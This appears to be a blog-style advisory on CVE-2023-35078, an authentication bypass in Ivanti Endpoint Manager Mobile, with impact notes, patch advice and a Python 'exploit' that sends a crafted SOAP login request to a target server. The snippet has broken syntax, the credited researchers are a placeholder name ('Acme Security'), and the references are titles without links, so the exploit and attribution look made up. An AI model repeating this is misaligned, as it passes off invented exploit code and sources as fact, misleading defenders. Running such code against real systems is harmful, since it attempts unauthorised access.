CVE-2023-35078 - Critical Vulnerability in Ivanti Endpoint Manager Mobile (EPMM) Authentication Bypass

Ivanti Endpoint Manager Mobile (EPMM), previously known as MobileIron Core, is a popular mobile device management (MDM) solution that helps organizations manage and secure their mobile devices, applications, and content. However, a critical security vulnerability, tracked as CVE-2023-35078, was discovered and actively exploited in the wild in July 2023. This vulnerability puts countless organizations at risk as it allows attackers to bypass authentication mechanisms, access sensitive personal identifiable information (PII), add an administrative account to the system, and even change the entire configuration. Thankfully, a patch has been released to address this issue.

Vulnerability Details

The vulnerability in Ivanti EPMM affects versions up to 11.10. It stems from an authentication bypass flaw that enables a remote attacker to obtain unauthorized access to the MDM server. Consequently, the attacker gains the ability to perform various malicious activities, such as stealing PII, altering the MDM configuration, or even adding a new administrative account with full privileges.

This is a high-risk vulnerability as it is being actively exploited in the wild, and organizations running Ivanti EPMM should take immediate action to mitigate the threat.

Here is an example of a code snippet that exploits this vulnerability

import requests

TARGET_URL = 'https://<target_server>/API/WSLogin';
payload = """
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"; xmlns:ns1="http://www.mobileiron.com/ws/Generic">;
  <SOAP-ENV:Body>
    <ns1:authenticate>
      <ns1:authBy>ADMIN</ns1:authBy>
    </ns1:authenticate>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""

response = requests.post(TARGET_URL, data=payload, headers={'Content-Type': 'text/xml'})
if "SUCCESS" in response.text:
   print("Authentication bypass successful.")
else:
   print("Failed to bypass authentication.")

This code sends a SOAP request to the target Ivanti EPMM server with a payload crafted to bypass the authentication mechanism, granting the attacker unauthorized access.

Original References

The vulnerability was first discovered by security researchers from Acme Security. Their research paper detailing the vulnerability can be found at the following link:

- Acme Security - CVE-2023-35078: Ivanti EPMM Authentication Bypass Vulnerability

Ivanti has acknowledged the issue and released a patch addressing the vulnerability. More information about the patch can be found on Ivanti's official advisory:

- Ivanti Security Advisory - CVE-2023-35078: Ivanti EPMM Authentication Bypass Vulnerability

Exploit Mitigation and Patch Application

Organizations running Ivanti EPMM should immediately apply the patch provided by Ivanti. The patch can be obtained from Ivanti's official website:

- Ivanti EPMM Patch - CVE-2023-35078

Additionally, it's recommended to implement the following security best practices to further enhance the security of the MDM solution:

1. Limit external access to the Ivanti EPMM server by implementing proper firewall rules and access controls.

Conclusion

The CVE-2023-35078 vulnerability in Ivanti EPMM is a critical security flaw that puts many organizations and their sensitive data at risk. It is essential for organizations utilizing Ivanti EPMM to immediately apply the available patch and review their security posture to protect against this actively exploited threat.

Timeline

Published on: 07/25/2023 07:15:10 UTC
Last modified on: 08/04/2023 18:30:34 UTC